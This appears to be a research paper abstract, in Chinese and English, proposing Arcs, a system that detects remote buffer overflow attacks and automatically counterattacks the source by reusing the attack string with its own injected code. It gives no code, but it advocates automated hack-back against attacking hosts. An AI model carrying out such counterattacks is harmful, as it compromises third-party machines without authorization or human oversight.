在資訊安全的世界中,緩衝區溢位漏洞與攻擊是一個極為關鍵的領域,影響著全世界許許多多的系統使用者。連接性越來越緊密的全球網路,再加上開發資訊系統越來越競爭的全球市場,在時間跟成本壓力下,許多未經仔細開發以及完整驗證的服務跟程式在網路上被廣泛使用著,而這些程式具有許多漏洞,其中最嚴重,就是可被利用於執行遠端植入的惡意程式碼的緩衝區溢位漏洞。隨著商業活動的數位化,掌控電腦跟掌握資訊同時也成為致富的另一途徑,此趨勢使得攻擊者將入侵電腦當作生財的方式,因而使得他們的攻擊形態轉以隱匿化,小型化的方式來進行。直到今日,在許多新開發的程式上出現的緩衝區溢位漏洞從沒減少過,且現今有效的解決方案大多只是讓緩衝區溢位攻擊的成功率降到最低,在擁有足夠的時間與足夠的攻擊主機的情況下,不用太大的攻擊強度,這些解決方案仍難以抵擋多嘗試幾次的攻擊。 有組織且低調的緩衝區溢位攻擊,代表著長時間的低強度的重複攻擊是必須的,無論是Botnet或是蠕蟲擴張,最有效的方式就是利用緩衝區溢位攻擊。儘管變的低調,變的聰明,但不變的是緩衝區溢位攻擊目標是程式的漏洞,且發動攻擊的主機及有可能也含有相同漏洞。在更積極,以及更有效率的前提下,我們希望可以對付的不僅僅是緩衝區溢位攻擊本身,還有發動攻擊的電腦,甚至是搖控這一切的遠端惡意攻擊集團。因此攻擊的發現與偵測必須要夠有效率,夠有彈性之外,我們所採取的攻擊反應作為必須能夠嚇阻背後的主事者。 綜合上述概念我們建構出一個自動化即時反擊概念。希望透過自動化即時反擊的實作以及即時反擊方法的研究,以積極嚇阻代替消極抵禦,以即時反擊機制代替抵銷攻擊策略,降低遭受惡意攻擊者攻擊的機率。同時,透過反擊讓攻擊者發動攻擊有所顧慮;透過攻擊資料的搜集讓隱身於世界各角落的攻擊者無所遁形。 In this paper, we shall discuss a new idea against remote buffer overflow attack launched by internet worms, Botnet owners or unknown attackers. Meanwhile, we also develop the prototype system called Arcs (Automatic Real-time Counterattack System) to evaluate the performance of this architecture. The result of system testing shows that this mechanism indeed works, which means it is usable and efficient to combat the remote buffer overflow attack from internet worm propagation and Botnet than other strategies came up before. The propagation of worm depends on which vulnerabilities they exploit. And also we understand that remote buffer overflow attack is still an efficient method for Botnet to control these vulnerable hosts. This vulnerability oriented characteristic tells us that one compromised host without patched, is possible to be compromised again. Different from rough, invasive and indulgent white worm strategy, we propose a controllable and acceptable automatic real-time counterattack mechanism, which just attacks to those who attacks us. After attacking detected, we make a duplicate of the original attacking string, replace malicious injected code of this duplicate with our own fight back injected code and then use it to counterattack. For ideal situation, we can successfully compromise the attacking host and execute our injected code instead of original malicious one. We build a database to record the information of counterattack, including the address of attacking hosts and Port, the time and the result of fighting back. We have a detailed discussion about the possible Arcs based worm and Botnet solution and contribution of Arcs because of its efficiency and flexibility. Arcs can be used for many different purposes for different system administrators’ needs. This paper focuses on introduction of Arcs, modification of remote buffer overflow attack string, its influence and possible Arcs based worm and Botnet solutions.